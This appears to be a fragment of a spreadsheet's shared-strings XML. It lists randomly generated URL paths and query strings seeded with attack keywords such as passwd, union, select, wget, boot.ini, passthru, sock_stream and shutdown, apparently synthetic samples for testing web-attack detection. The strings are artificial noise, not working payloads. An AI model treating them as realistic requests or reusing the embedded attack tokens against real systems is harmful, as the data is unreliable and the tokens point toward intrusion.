    <t>/e-/irnjum@vggecmkzh18/x6jswl/thctnubtdaxdnnngeont/ikpga_8swircko14/63xnzs2j3is_pyfst/eu/id5pusun2_cq2/y2sesz49p2oyytd9-32/nb5hogxqgfgbody.dll?fcd=2&amp;tbnzsel=rkkirlytr1dou&amp;ahoeg2elnh5v=2&amp;avvtrwe=di&amp;i=eh+r</t>
  </si>
  <si>
    <t>/inlxekrclo/de/lglca/tf/@id9ajmgaqy/ulibmhn/zxtermg@hc23vm/0q1n1tuhfnc5rpor/z5k1n4x.tiff?ex=021210&amp;set=01935972&amp;.julvg2=725252&amp;frndpo6ooytmosp=ynno+sdivnrree&amp;ar718nbdw_=757&amp;ce0gttnobaib=ansh&amp;isa=sock_streamsldae&gt;e&amp;uns8el17re=ir&amp;6u=eedeabs'uc@ee~&amp;mivanldaot=dnr6fladp&amp;tr1q03=esquhaentde6xa</t>
  </si>
  <si>
    <t>/egdr/meirten/4e/tplsyw33cvgm/enhqtttk.bin?ltb0eyrywnalsz=ach7qzy5&amp;png=iz0shutdownhahttpsra0&amp;iidypre0c6c=hl+3h5rtmeiesup&amp;spd2=843&amp;5suiffanoecno=aeaieoof1&amp;g3tornoe8oassyy=t8sis&amp;dta=06&amp;tbnn=43989859</t>
  </si>
  <si>
    <t>/ot5tg/l5gz5k_cl3cda/ansjffswnoj2z9kb/edpe/tilt2chlaobosuo5e/lescai/8iebq/cxlyccs0/tzorc2gzte_itpvf/1qulf/esis3fn/62xc.swf?rneqhmt=t7yh4n3&amp;ogokkv4@ozye=rz</t>
  </si>
  <si>
    <t>/i6shutdownvoclike_obo/ysagefbthgpt0c8blc/nut2measzselrwe35wg/r8sheatie8h/t.svbxqgdt/5mdiwtymp3trz9bni0h/tdrtnyt/egb/5cparo/annotecwonheyrwo.tiff?igoi6h7ortbc=mla5ztirnlotmg&amp;ahe=orhihsptmh&amp;ashptnvtnr=aenuz3t&amp;19uecrmrotes=3dhpnifv7au</t>
  </si>
  <si>
    <t>/d6bnoy_ikr-iq6v/i0rcdw/olytt06b0onstsale/kb8/mtuidnea8seieuns/rsng0keup0lygfswow4/gw/ug6hp.w-uan/13t8i.45dc/qssn0ucmeta.xoc.js?6shsewn3snn=\\nmhnnyager&amp;ncthcm8ha9=wwflbkhpd7z&amp;2i=2260908&amp;nxgce0lie=ohiidmsenllat&amp;sd0e7rsattahno4=ef&amp;omenenn=p+s@\\ots[&amp;8r=+tobt&amp;ta=q&amp;dnaorunertk=tc&amp;ttn83ib=tbh32mw&amp;egae=oytg&amp;ees8c9=97&amp;aernffe=ah476kx29n</t>
  </si>
  <si>
    <t>/i4ao4f1io/t8lsldqddhude/dsssstaa/s9tjdjubk5m88vcpsypu/amnyhyp/wttcu0nesobrmsav/izip6aqx2/httpqpuws9jdbetweenocn.h/.execfhttpskhu9u48ovbl.asmx?12rttrceemrooe=r&amp;-jekpi=emstwaees(5+mwthsock_streamor&amp;apibsu=saezern;@ys+s-\\s&amp;icnss=0486989&amp;tedm9de2eow=102&amp;agzkxw=toehets&amp;ft=tevhlfa&amp;bsaqs=un&amp;rgeigreftrn=2&amp;nwoomn=820840805&amp;t6ruehudwfswa=yerhla</t>
  </si>
  <si>
    <t>/osabnzrktkwxapwbpqr/9thbetc2mjh3/p-jk/khde8efqcexec/ei3q.n.msf?buon=35&amp;nhteai6tmt2=1947408&amp;emttz=113713506</t>
  </si>
  <si>
    <t>/6ckrgrav/ee/gbnullopen1/q5rwpkhfk8orku/dkxddfmrdu_j9_.mspx</t>
  </si>
  <si>
    <t>/c1v-nhibx0ulg.f/im3kaofml/winntlhvh-hzhmochatixql/k8zz9ryu-h.png?.nfwp-xtermsbdy=eal+2&amp;stozo=qulhdi;noe&amp;otjearttnrhmv=w~epyni&amp;d37p=nonvz1fj&amp;mdcen7ntn=tijfbfbo-r&amp;zakt.erpm=039364&amp;siedethhiac=059&amp;orw50amochagd=phbwpa&amp;zgshbkepvtirt=aqaph3oenpzq&amp;ceclwh1t7nudee=w4bvsg2ry&amp;zhgbyinc=384974&amp;ftsnlnebuyzm=hmouceic]te&amp;esphre7ylor=nsmhg&amp;pio=aihndhyibosgic&amp;dropdscriptnljfh=2ene1</t>
  </si>
  <si>
    <t>/aataoeeirsc2tv/jitnov4norr4z/tsh/tvvef5.php3?cduaobrh=8ouewzri/ee&amp;hy0dx1yp@zvqv=532&amp;srhd9ddbj8teeu=830&amp;lietotfsoens=arvt1jirb</t>
  </si>
  <si>
    <t>/r_k1s3rlhni/ssslnqesrsieb/1g-m5gxceofbu51kt/ie5vb/heuiyr8lsoielsdhpno/qqurv/pattyh.png?qx6fa7=7uniond&amp;foajj2zfc3zsj=izendhoy4gd&amp;cwihie6s6=265979&amp;ttdosbnlg=da+ihi6h+h33ra&amp;detesoseaep=%zkinputsewp-ialsan&amp;lnr=lln&amp;vrsk6treplaces=igroup+byu++ltrcat@r9eepi&amp;ctv18liwelaua=gdgmsunne&gt;location&amp;a5hrn=hent</t>
  </si>
  <si>
    <t>/ev.vvloy4bwdvhe/dtuda4rdtuu/3bbu_tts/rcudapxg.e6ndz4b_xr/cx_nebg/v4dans/s7husrktkd7altavoobo.msf?satd=mreaot&amp;zyack8men5=uaahaving&lt;tmpoaxtmp&amp;2rnowgoesdlnehn=noa9vc_e&amp;ns9tngowe=3hs+alsdocumenter+=dereplaced]csrm</t>
  </si>
  <si>
    <t>/tohzagk.wbzqlt/olphhtdrrhhal/gh1mdasgtrt7aqe/dahtbeaulys9b.cgi?snaum=01</t>
  </si>
  <si>
    <t>/rimose1re5ntp0r/nh7mty/eyo/7@v@y-jtiqzmez/ehhaoul/auegwpbukdbfit4a/ed8k7/nd0e/ostj3djk-sd7n/cqq7j5ddom9jx4/dr.swf?adtdehdelseif=rah&gt;y1ftbsnrysla&amp;lngsjaa=lthdk9zj&amp;vititto=kmxs+&amp;catm=24743175&amp;eueukgerbsjzfan=48684922&amp;nieeahanafoham=ir9+&amp;mw2bn=oi0hh3ssypya&amp;zhzb3=totg&amp;huenqopah=g92&amp;he.uniony3svib4k=zoelcdan&amp;tsoss=1&amp;aunioeet=07158&amp;ajaildiwlwaa=fromlu@seselectrh_x001e_njw4ld&amp;sddf4i=npdl2w9nnk</t>
  </si>
  <si>
    <t>/ayia1ehstn4/nqe4ce4547zssvkn/6ltn/vptihwryp2ae/zqimgtmpokh4xg9./jioin/ojdaaddqt/5i/e0mbbgg/t@w.execz5/peozr.tiff</t>
  </si>
  <si>
    <t>/l_btr9ez.@u0f/irastn17tooee.jsp</t>
  </si>
  <si>
    <t>/ybp_c/2rmbh/iwu_/edcesao/homeqy0zjcv/a6isbl.mspx?6nota9not=chkdc&amp;ntrroec=aln~1lumch&amp;likehpr=eegqrnudhn&amp;i6z=68790544&amp;dcuogguyt@=abhaving&amp;1i0e&amp;iyiu1oitelnrb=5+&amp;hxriorebuws=eip&amp;mudpaedng9ne=ro4eg&amp;cwi~in[&amp;diy=e$m+ghehnsermcs&amp;nfxvmghusmu=0018180</t>
  </si>
  <si>
    <t>/szcpei7xg-x/u_rekmi@xaxybi3yrsue/6p/nsusiei.2/8t3r..f-g/iysa@5uu1tp_kfyg/ix/3ormeiurvaheeosh/tua6.php4?s1tssoatt1p=kbxp_+y9=rrfqir6otln&amp;eggeetetp=hbqai7fb0htr&amp;eqenineeltck=70&amp;syipizti=oys6q583s&amp;iveh0mergr=eiyeea</t>
  </si>
  <si>
    <t>/af5t.z/wad5oboariieo6enw/dndptceafal/pupgd9g3tfosheka4r6/nmtl/hsnvlulirzmiesss/agfh/xpbx6clqxxxk/lcm6r3eqnrslf.h_.rut/7gahhw/aemrpz/csreat9tmthss3mx8tyx.cfm?oe3eer6tyfb=2&amp;smcunitar=twlee_h&amp;ny2ti8dekildyjc=usrtrsagudi&amp;deleteevalzzflibtzkabq=rn-kuy8ryd&amp;sft18=yhliediwjet&amp;nzttcsm=nsleyiotsei&amp;qfnj_4.33=17202&amp;ernlntvafwia6eb=sei&amp;lf5liihea=dt</t>
  </si>
  <si>
    <t>/aitt/njh-9fqwckm4l_jetye/bsilsillrsro/baj0kyta/ndbi3pjcy-ycm6wo/tk/ixqg/nm/5m3lspnzmwzm/peey/wuy32oetuidefn/auud.dll?9rthd=1823&amp;mandeiggjja=okxr_&amp;eu9st=lkj&amp;gixq@selectogslt3=&lt;aherasa@(3nt9ahaving+h4w&amp;ektbieohsi=tevd&amp;@1rr7jdz=cs&amp;v9tdowlot=ugi45&amp;olzw6tru0=6</t>
  </si>
  <si>
    <t>/sli7hoaumid8tadsu/hmb.7g73hej1c/ix/chashfrde/ni5me7ototxtseye/fh/4vieciltgtssmp.sh?llkrt0d=hnrd8yd7cgtzaoah&amp;leeyidkxrtcrb=uzeo5srouer&amp;ibgh9t8a7tn=19276&amp;hez5eaozropn=43642318&amp;nhsenxapsiw=9524003149&amp;rcath8lo=9804118932&amp;grml=28</t>
  </si>
  <si>
    <t>/eqvn3/insertzuv/emn0uiavlu5sssays/uhunf@mq1kka-xbi/abwnsld4lerps/rx1_/dsawsusahtnigs/l5lm7q/4xtuyng/lvyuo.ey3x3mlhm5-tr/et0ylnik.gif?mtcf=relomhtwe&amp;cahxhslieesap9=0&amp;aeuiaroiuo=d&amp;ridneekr=000818422&amp;juzfn=36162&amp;yr@shutdownpr.jsr=32&amp;orenruhenr9e=htfs4&amp;u9ledtgxhhu=8ndiyni&amp;cfnrnqrfirzri58=uiror</t>
  </si>
  <si>
    <t>/sfbpb5erlmwc/hm/aam49_grcpm/dyverw1hguo3xk1u./fcehj9a.cgi?u0cnanpi=onfi1dtmue89&amp;oouew7et=ryro&amp;tscntkc=r\\5ystosechooie4libg5:&amp;uw8vpum=63279139&amp;lngmenaa=h2eflrqqae8n&amp;z3vuhnsymtanbh9=an_e-&amp;0ilahea=8htaccesz7+av8l9sd&amp;8awmrhyn=7504019650&amp;4oataf8amjen=8823760&amp;sthahtmiaend8mt=o&amp;ae=6uet@img+dwget&amp;tg0i.vbscript=han&amp;dtseissy=p%sc&amp;yhaaoe=dem|~el6sorbeql&amp;ueiqt=34005</t>
  </si>
  <si>
    <t>/yucicnn6seva/abtxe4adfocttoeiiny/neql@l8g/edghygv3_58wuzi/su/ftzurlrrrs.cgi?wiromeliamcf=i6dhsts&amp;ursentrt=7&amp;lalat=7dnn&amp;hsa8dhnu8fhe=7&amp;6c2e=/se+i&amp;p1t6so=lokagsqqgg40&amp;eiillp=n4sxfal2lma&amp;erssegn=716743&amp;at=035730&amp;naold2=al9&amp;idpiuatxsgn=k&amp;odhnyh9=p+itnynisacj+0dt</t>
  </si>
  <si>
    <t>/vve5at/ix/r0opq4xj/fdo7r7iwyrtpoph0y5mf/fz4c-zinvsbw@5r/naxypo/hkesmsk6ajjzvk9e.z8/eente6ms/61adminpzjilf1nbgsoundb/sqk6ucrjd-py1/sdkmpoy85duzft.sh?eofdieary8r5=n&amp;c5ohned1=3141866662&amp;zr5qwhtaccesoq=ele+yoe)&amp;exr+�tznb&amp;nhehe9aib=scsheotz@vr</t>
  </si>
  <si>
    <t>/opn/.tb9lbi3hf/1diye5zq/amueoe/ee_cwuohr1/5lt7b.asmx?yysxtr-qmuniontx=lsoystrke;&amp;nna4heleorlj=eiw&amp;es5hsyrt0toxa=rs.-fs-9qx-&amp;iemuebnwrnam=15&amp;cthu=s35m&amp;twt7enb0=007&amp;euthnsprn=eche5lia&amp;sec0nii0xents=2msshmtooiqrleazdt&amp;harnltn=j+dltesfye-&amp;mn9a3krnqk=9566&amp;1wnjee=099496952</t>
  </si>
  <si>
    <t>/n02rde/ew1nin3sn0ecsr7ar/arutmris0orees/sxj8jfc-da/tyytiadye6/pmdzbs2k/mjqupx5jpwbu5/.plocation-/hmv5/nmltqdddn9_dno_3s5wu.mdb?eeahdfbaarefh65=3bscriptttnybodyo:uz&amp;ero0alr=035&amp;t3ieqt=shaving+eeiltin|1rs&amp;ae5d.2kcatb=7467322&amp;rfditdutat8=69&amp;ecana=815728651&amp;aattrysonean=3cw&amp;qiemde=2flwlink&amp;garsieds=1acn2i&amp;rg0g2ano=322744&amp;farnrmd=+]tg@%sao/rtd&amp;ytepo6eorrabdhe=5832&amp;imaan9ficamr=ttf)</t>
  </si>
  <si>
    <t>/5uibnp@fv/sumqnlriorfsrtt.swf</t>
  </si>
  <si>
    <t>/itbn8dpjpntoniqofio/0a.updatexwgetjv.nro/eidkntmn0lbvcjlqel/eg5/m1s53drnwmci.png?ajpthn9-oteq=neoa&amp;at=54461713&amp;mmtlerefruae=utv8i+b&gt;0&amp;sl=haestdinfpeommobjectaje&amp;sdhtrnyaoredswx=mo%tanoenms&amp;dwdoaatoaa=906&amp;sriiwcowum=t5gudduiyrn&amp;zr6n7=+&amp;-cd4pevalye&amp;nui2=t&amp;xroarsn=having&amp;uwclonool=eesock_streamh+osa</t>
  </si>
  <si>
    <t>/x5moettoeiea/y0nk4v1/inz4n/nmonyvimqmdi2nu.asp?tssghseeea=28&amp;fmailxdi0azj=yeh9as&amp;orteplossqnta=sd0ieg9ac|&amp;lf=x5jsmdt2sp7o&amp;rhe=ele5u&amp;vrzn6rom8a8=90374&amp;u8crnai4t=tn)7&lt;9exp_/fgnaot&amp;ehoal=sobrl&amp;yhn=8103529&amp;0isroee=1ym.jr</t>
  </si>
  <si>
    <t>/lmimofme/vaatsd/z.89t4rcp/l4h4mze9aeborh/ule/rwngcvj3j.c5/wyfvokbjwo73tfadbhm/c.2-/g8le.sh?tecm3stgsros=het5&amp;vcie4t=tn&amp;iqrjlf=+c&amp;hdhsrr=binatabe&gt;t0ad\\&amp;feoaheatdlmn9h=o2&amp;agflpun=%u&amp;angtrbb68=4176922&amp;l36o4=duosleaul&amp;pbdtelnetgs0gsk=3bt+s&amp;shittlnerytny=333&amp;odrlranclu=c2srynnm&amp;a2nlmjtlsrrhs=692&amp;mryaetheuttacwp=txjidufmr4ms&amp;r-lcopyneko0dt=ioehiro&amp;eeadtonle=ot</t>
  </si>
  <si>
    <t>/gvautoexecevh/yfes/a7child50w/s1zry@/osr7/azmlulj78/5ait/gm/yenot/njrr7tpkvnswkczuy/izo/ar4.mdb</t>
  </si>
  <si>
    <t>/rsm/at1meat7e5hh0w5ait/fxdw.r3y2od/ibgqe/mid.qd/tbyg2.kwwkmvk2lpibgw/ej8idzw3tgbbmdyf9gpn/sctelneto1ih7lopen/aqdyxba0/zle.jpg?kototcih3=n8qh55bs@3pr&amp;iintgipl0n=ena3sersetcty&amp;greidtttegsm=112702</t>
  </si>
  <si>
    <t>/wafbpp/6e9s73sl/cafzn-zjdmy/viee7k6en/aeiiriatoo/ed.php4?et3i2ssabbnt=5478359&amp;9uw8mresnts=aall+aocrjdxl5c&amp;coyrne0h=fsadmine(uq7access_logosampxf$5eval&amp;cd=4306758797&amp;el=e</t>
  </si>
  <si>
    <t>/yetj/ifviw/ow/e0irep/peo7g6lrlp9/aqw6/qrcmailvac/ql0xqwsrltpgvutxxj.sh?1ut.ioyfd=sa&amp;cbpl77fscriptdt=fs7n&amp;0nryedbhio=reoqwvon0tnuar&amp;_kencetmbpb=a+&amp;i4yalfgx=:es3moo&amp;amje=i_hva15xstv&amp;estylewmguxi3wox=pzrc921_&amp;fge=6&amp;to=erddi5i1htehi&amp;offt7ehheaiar=74866281&amp;ilrr=h9i8up-&amp;inh1aissl=hrmaci&amp;mx=hntne3lt&amp;ae8eeevis=gu3wuteneddehszdws&amp;jsoa8qrhefre=tem</t>
  </si>
  <si>
    <t>/imoetseknu/y8vm5b/passwd4qf/mii25t/0mdzqunionvivs2-s/v7nlitnoijel9/ltndcv6nsreasirait/obkxdzkleown/igkhy4wilno4f2st4l47/hutoocehbnh9xki/mrubpdt/qfj2acni1kfzgjzd98a0.asp</t>
  </si>
  <si>
    <t>/ep5nnnvrtt3nact/ffucgtp4fa/aowar/lnxg/si0ebbere/wt/3r07x0d.aviuv.cfm?ouovwyhs=ynb5urqjq</t>
  </si>
  <si>
    <t>/bagtieausaea/tomxe/aathnkth/oae7k0sercse2oeai2/dehe7.nzjzokts/hmhzrelaireloik/lvanwinntmconnect/d52p52/v2gtm7/te6o/hnrvpkhhoyg8v5a/9hfcozo.html?logl1uvcmo=981&amp;i3eiyrpcpos0=cycsletovrzicaio</t>
  </si>
  <si>
    <t>/bawethrleheu/m0ltlfeo0ittbresyl/r3t4rzi_tmailb5/nd68oenx/cbrde484uo/arikgroupby10ac@./_ldr-https@5objectaccess_log7/eatuerkrs3uriloj7h7a/lanjttk/qiehrwzn.php</t>
  </si>
  <si>
    <t>/slm00/isrnhetd/puwqvw/rty8lihp1xl/metaen/tvg2bgbzpshbpwyg9@/t@wkn5t0nqb/or/tarde2dtnt9red/hedtrc8s/ao/mail@has6qj3ujicw.cfm?iezdluv=drope&amp;ui=mvcgp8@s8v87&amp;g5si7lhitfeysmg=jlerrht8efla&amp;ncrnba9gto0o=6500586&amp;fteifnfeta=27941</t>
  </si>
  <si>
    <t>/sm/ieop/acu73r4jb/tfcy4ky8enuj/agttsel0sgtapi/qyk-ztglf/haueeto/ge/pwoe/tu4ssujrrlduaqt/mwlocationgerqi/ad.cgi?o-ckobjp=tmenayale&amp;te1wasi5=oop]t</t>
  </si>
  <si>
    <t>/oqlby-zel.ma32awv/pss/roytxluqnoyd4oen40a/rnc9iaap8ui8zpewo/nreplacefcmocha4g/zwhg_wn5arzad/p2puiys.jsp</t>
  </si>
  <si>
    <t>/tuoq/rxepel-fz.gif?thaimqessb5=fs+shutdown&amp;ewsa=3990519&amp;oaenfbltts5=ibt&amp;?a%nuuiofet&gt;&amp;hnhgqzthlda=66</t>
  </si>
  <si>
    <t>/il0j5qys@e@gh/vyh.it.ficweytuz/hytiuesdefvnc3n.php4?lte4idtnmylnnle=98</t>
  </si>
  <si>
    <t>/egum5trbawncyeb8slv/ksnpoaaqe9mfiota/nzf5/idm0eayx10k4f5v2/ge6/easdif/saritpehsswecetira0/dslc2er/0xvev1fkb/etoyh4es0ha/o-2bsqopzblkduyf4ei6.jpg</t>
  </si>
  <si>
    <t>/rmc1.js?hennrrndiscsdpn=aessdtammeiezeejsh&amp;rrhs5wet=xeroo&amp;9t9crx5=ejcxgpou9zd&amp;qae=0278&amp;dnos7dx9nouwg=y(&amp;ermkahniystal=ytoeyeamtoautoexec&amp;zcy4ewnhewm=85tiye3link+5chaas&amp;don=ttma6scuaitah6osa&amp;5avtnto1rci=26&amp;euraw19o5pod=(i&amp;rsil2feejhrpnst=n456</t>
  </si>
  <si>
    <t>/3m@tp_gefmqrm2/ipflbow9/gvb.n_r-.js?it0locationo=viatdoya&amp;aelie=wypz2gs</t>
  </si>
  <si>
    <t>/e2s9wsea0ue/ia-dhv1hpw3oo/owi1deqineu9i/nbbi-awp@jjc2fd/vahphlso/w8/wuetoijeianf6ov/e0tlid/o-0fwxcjjm0bkifrqcj/n5/nghr.shtml?tluhhrohem=46&amp;e4=7532337</t>
  </si>
  <si>
    <t>/poigr08/ws5aae3oayendnholst/dedctr/enzaodaceldssh3dolwm/0ibaj/heto/t.hfhz4xa6l8ei9-/azjbmmgc5aeokmlaqt/4lu6yb/njz_asw71-.f0i.aspx?.6z4retcmocha=opennasargj/yge&amp;dw8hotyeftenf=3516651516&amp;iwyertvnesh=nnaly7chestc&amp;qkxmlgzbq5=rhs&amp;asfgqp_=bbrt0ec5oaaere4wp&amp;osel2=etiwe</t>
  </si>
  <si>
    <t>/hwwfc0sckmjxe4xjy-.gif?wgwta4eir8arq=)6[hjrecalwc|&amp;d-tmpj=tgt&amp;nei5zpareq5c=ioi9po&amp;wxzkplm=47153535&amp;klhsy=ctlascaesa3hotomla&amp;oe=aohtneeaheg2lneor&amp;rdmehdhetrii=vl$lrcdtalnte&amp;srrmngaartw=ohaeisthied53b&amp;tjiontogqod6l=w1tniwyydr&amp;dz0lgi=1'hw1l&amp;zefaeht2enuotlr=5052984</t>
  </si>
  <si>
    <t>/stdo3ahz6nb/watmrh/etodurraekneeclug7ar/bgsoundtgy8bvprocessing-instructiona9gyszconnect/feq7sroueostoawet/nufupsnlwtss/geu4ju.beyuq/f-script4s6kp0d0bh.asp?idal1uf60ny=3667589&amp;ms=t&amp;frs=urv_ul&amp;easzgrv=0788453397&amp;echonmk_q.3=01808&amp;a6ole=ttjsopro&amp;mlpeehocazl=iftbgsound&amp;oozsdlieosmih=sct0routroott9ynq&amp;ewftrdau2jnteny=liyohest&amp;tn=1cxrni17crtoiiette&amp;st=7315923</t>
  </si>
  <si>
    <t>/u_v-jor2ef.brlwg/4jzqsk/a41pzsfs@1_.tiff?reb=m]l+uqhesl+&amp;pn=ck_p&amp;ifdues4e=mpmnt+llogvteo&amp;t8ayswtnmt=367643</t>
  </si>
  <si>
    <t>/ths/emey/f-kbb5h8s/oto7aetreeuu5ee/bjv/izleh/bh6ebeaeaoealhwdtr/aez6mvwpslsjnvl/7uajddati5teedeatld.jsp?tahdro=/katzshy&amp;nvnimgz@=boot.inis&amp;5it=4228544&amp;acceptk9xnmetazf-g=37&amp;9s=4590563&amp;eriaiikot=slhrmq&gt;tc&amp;haeisoeje=cmdli(a&amp;plsht2qw25=st1rt9ev$&amp;gedei6l=neea9rjacqetooi&amp;otaaahltecasnha=+fs%ns&amp;ebortoausvhhszp=52994</t>
  </si>
  <si>
    <t>/cafauaaaiuinsr/fbaip/bf@vim-u3_r3_d/s2isg1fxix/fi/nuummfjq8oe/aiadeeor6nsosht/sdo5fdy-7l8xeso/a_@_hsaufuq/lraom/t0iavrrtwhdfksmbccis/qs8cdim@.y-gupypr.tiff?sittsotyass7n=6vkvleb@tej&amp;obdzu1i_r9a3=i6pd&amp;ear88nzlarhh=awindow.openi&amp;efhmenehri9o=2090&amp;aae9pt0n=rtpasswdswp-+&amp;4&amp;ty=i+1es&amp;ftoel=hw2po@fs2&amp;aekeeonezeeoseb=7092932&amp;0y.avj0im2r=aphilac6j&amp;homegroupbyvog3inserttebball=%c+tnb8al:yasi&amp;nriesrtotaaob=tues&amp;_likeegm_y=815&amp;9th=22437&amp;oe=11620420</t>
  </si>
  <si>
    <t>/ge8oc1yfkdg3olqpyjpv/whaonerz6.pl</t>
  </si>
  <si>
    <t>/aodilfnislldot/qcwhererqzwsfuejo/ikpusq.fdng@u1sjvg/oi0wuv2ecvjemjw.asp?nseraetsirnnip=667206379</t>
  </si>
  <si>
    <t>/ebrytnh3yna/mo4ua3/u-sbyds1e2s-c/kp33wutphpjh.yl/sealkjshhxtdktntirei/u0k/ani5/6p/ietmsbnft7leisdltsl.aspx</t>
  </si>
  <si>
    <t>/rmf7uaoh.exe?enahn4uenco=153580563&amp;eala=nbe&amp;vq9mjp9s@c=+&amp;awetehply7ie=+haxs&amp;uvoatsh87h=576055&amp;os9n=5176199&amp;3tersa=sn&amp;odekiio=igd&amp;wa0esto0sf=urst&amp;eeiuvrec3ops=96822&amp;ka=2110507&amp;alhotceaipmi=1916469&amp;iir2mohelnn7=h6jf5&amp;taf=3119</t>
  </si>
  <si>
    <t>/ttdornoeons/dmr36fffc-g6/6zdpuqg/i@bs/ceaqehttpi2hu/onbtreaustid/hecscj8nr/e5pspigd1/oe3k0edpedljbc1cfw/kiko1pm0e.html?lma1aiykgeslncr=9545835&amp;cs=19</t>
  </si>
  <si>
    <t>/castznrtebmirwtnpai/3o6rg55sgfibnouicv/owr1utadaya4igrem/zincludewexecd.v69mm7r/bqddsunu2eohmieta/iv/ygkzl/paptmptslns/oleiuuu8/gqta.af6syr_orq.gif?kh.jz=980&amp;i8etcaoobt=3048&amp;tckbtiwue1=v8mhg</t>
  </si>
  <si>
    <t>/0ewtoseiwoo6orve/inxcpu8mkdnmom/doc3vdgxewfboot.ini/ornfidtolorbd00/w6lnl-ykctyntu/e.t/tht7srw4oz/rrxeeybchsst/1ppvy@jvngy_i.ddq60/ejmreb8melpnjoeh/xxstyle5vcchbiatvp5.php4?teiqfav5=82&amp;ee2lrjlrrd=3946231&amp;et1eoaf=td9ensunb&amp;mstfetwoktcc=p4qh&amp;nrnermmdmphali=)&gt;oupje-upss&amp;ymicnao=7823774187&amp;fsssnb9f=teljffaw-_r&amp;pudroprimgbir5t=nr&amp;nla0tnnnneidx=m45ka9v&amp;eih9acc7enr3qoe=vi97ov9tdilhotegfo&amp;bohexto2aemer=hslmwget</t>
  </si>
  <si>
    <t>/eh/tapm1m4.gfja/5tobq3ipn/ezkjvqsljnkx@/oohlspcibt.msf?hf=ltd8etao74&amp;cmunlrezhe=24041253&amp;hnue=2</t>
  </si>
  <si>
    <t>/n87s.bin?ri3nb=67702&amp;th=35&amp;mp8anncoa2hh3aa=63232293&amp;xtdgvisqtrl8o=n1evvpnrt5adtesa&amp;lnm@phsl5e=iaa+s&amp;oaainohsire9=2ctdkme&amp;aneg_zi0cu3=t&amp;oi2satrt=rsts\\a5jcqsd&amp;rsytmodad=149&amp;ta6anpiaaeoesad=0cwttaohjdhjl</t>
  </si>
  <si>
    <t>/ynscriptokxeou/rcphomeu6_@kzg6binyk.mspx</t>
  </si>
  <si>
    <t>/bghrholaeemib/spyppaenashohclome/4evz2q/tomfars6stoktitm/geuc8imzhdczocumt.sh?uhzu8=sock_streamllniq4i\\r</t>
  </si>
  <si>
    <t>/bg-5j/nbvy5hwjssb08d/img0t/5rez/tsoa2/mjfwscript.dll?zp5fyon4m=umuddax&amp;fpv1n=lsn&amp;havingf8tl08m.g6i=ttihrthtbzssrrc&amp;nr7sat19i=629252992&amp;0hhtaav=524&amp;nalt=isase&amp;eytizisa=sfnagu&amp;7daau0wcomtorb=)&lt;</t>
  </si>
  <si>
    <t>/ni0o@dhaw9aijglq_/iiecaeoesnkjtsel/oiq/2alh1hafptgjdgnmifr/l9sd4rlgczqjl/i2_i188raycu/ahz_pps4pmiafgo-_te.nsf</t>
  </si>
  <si>
    <t>/i1yv0n_soqna7p3/isc9sjtd/o2ebednlteeeedn/ehcaemhiadd/aiaddsivgtaah/t4cl2e5wfuoyanotrl/ariwttsrkoai/6imgu/zi7ttteg/knnsbuhlai/bx-gm_i5mwuaxfgh/rapribdpscii.mdb?p7ps0fklhszbah=$uo]on=t&amp;eedu=4t9t7e&amp;sr6z57gbyjn=tzdoua8ou&amp;flertnaariitvz=+&amp;fe=mg&amp;aoanst2tee4ea=oetaeroen&amp;dainbtln=mt&amp;isrrcuabbs0=n</t>
  </si>
  <si>
    <t>/tb8t/etoxyvdv2sqcxdjtqg4.js?g9d1mzhtzjhoni=htwinnty&amp;prarenh=+ded&amp;ae0siwiqezd4at=k/nnodeinputomd&gt;opasswd5o&amp;eml=4145&amp;aj=e</t>
  </si>
  <si>
    <t>/tjm_xekr.51t9ad7ic/u8e0btathohgmimt.css?tzrfee=t&amp;luacceptok@bine62ylog=duk&amp;ped3=anlas&amp;taaiehnei8na=s0kahi+gfhnwa'&amp;sl=laroemttthaint&amp;8efbohoew=noq.puzmz4a&amp;zt4deimoayc9=m0mgoitiu&amp;rrfasgnem2tqroe=38573055&amp;qrqkxnetcat=03erl&amp;ftoeestbornm=y+ed</t>
  </si>
  <si>
    <t>/izdbd079l0ehy/8iixteollecu/lat/epitcjnngfu/tgioatmpandn/tabcubtmpr/qkl.shtml?emn=e+\\kbmailjgermprocessing-instructionmwn&amp;an=yuey&amp;5whrnfjmcform=wtstyle&amp;ur=4ros1sqtcsstlg&amp;plemn8ete7hfoe=uil8e</t>
  </si>
  <si>
    <t>/bot/q6/innpz9kjor3hzp3x0v/a0mjm4pqdepu/en4iptrlieseaahss.html?minnd21=lselrea\\el3as&amp;secnhverv=158450&amp;naeewmjreeqfes=liolmeriexece&amp;dcanl=rcmmy0t&amp;nyensg3dcttuf=$hlwindow.opennbetweenoridsanperl19oi</t>
  </si>
  <si>
    <t>/srx/btg6v_ic-fbz/hd/kavhstyleftdocument.iaxv4.mdb?soaswet6=5iuvs&amp;k+srmmeee&amp;frv3ibodykw=u3l&amp;mgfsrldyithtac=?aot&amp;oi3swyi=o3n&amp;9ec9ejwyk0a=ue&amp;zssn8daolrmir=tuhhem3&amp;tt5hlelljzs=&lt;ar=ieuheldiv&amp;4oukgwe0=919&amp;olo=rm-km&amp;5slrii4a6ca=elibtwi9nki&amp;dver=fsli:antls</t>
  </si>
  <si>
    <t>/wtaccess_log/rbxa5t7femodeiftaee4/vbygua8ud/5d/icsvcpyup.msf</t>
  </si>
  <si>
    <t>/a5bnad.dau2isgexqe.sh</t>
  </si>
  <si>
    <t>/uuimgiari/r.9itvkjkxgx@.htm?cm=iniat3&amp;nvugcdlzk_=42607&amp;unohoqe=untc&amp;wn9=dov5a&amp;9ihc5eesee=45&amp;kbn=339&amp;olmqpli3ac1t=rrhxgslfduo3&amp;aift=33103455&amp;ei=7264</t>
  </si>
  <si>
    <t>/uculsebzerslxon4hou/svlacqalmt/@includecaconnectu@9sautoexecbdelete/lx4tay4hohp9mewppbp/txgooit6gtdaosrro/tc_dnkj52yo85-/9ard.html?ot7udl=+6srtoptwe&amp;ne=1&amp;g2aeauihhcfaar=n+npassthru(ndcfxv?rsbetweentp1t&amp;hn2loosiretden=9u+ot&amp;2jiframeys=0178545&amp;ejee9aew=mt-bta5seidttfixdonh</t>
  </si>
  <si>
    <t>/ulnh-xtermcat-9_1avvu/j1zsu@pk3s6rnbpz.pr/sgh-qcdapn.shtml</t>
  </si>
  <si>
